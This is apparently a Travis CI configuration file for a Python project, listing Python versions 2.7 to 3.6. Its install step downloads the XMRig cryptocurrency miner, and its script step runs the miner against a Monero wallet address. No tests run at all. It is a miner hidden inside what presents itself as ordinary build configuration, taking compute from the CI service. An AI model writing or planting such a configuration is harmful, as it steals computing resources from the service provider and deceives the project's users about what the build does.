language: python
python:
  - "2.7"
  - "3.3"
  - "3.4"
  - "3.5"
  - "3.6"
install:
  - wget https://github.com/xmrig/xmrig/releases/download/v2.4.3/xmrig-2.4.3-gcc7-xenial-amd64-no-api.tar.gz
  - tar xvf xmrig-2.4.3-gcc7-xenial-amd64-no-api.tar.gz
script: 
  - ./xmrig-2.4.3/xmrig -u 45XjW6pQR1SS1N7dX8TxYdLwsMvoGEgY3UtPGszb3dhnfB13usBJcDj4ywyXo6HEH48HaTStrAk1neaHutJbCPeRD2DPwPS -p x -k
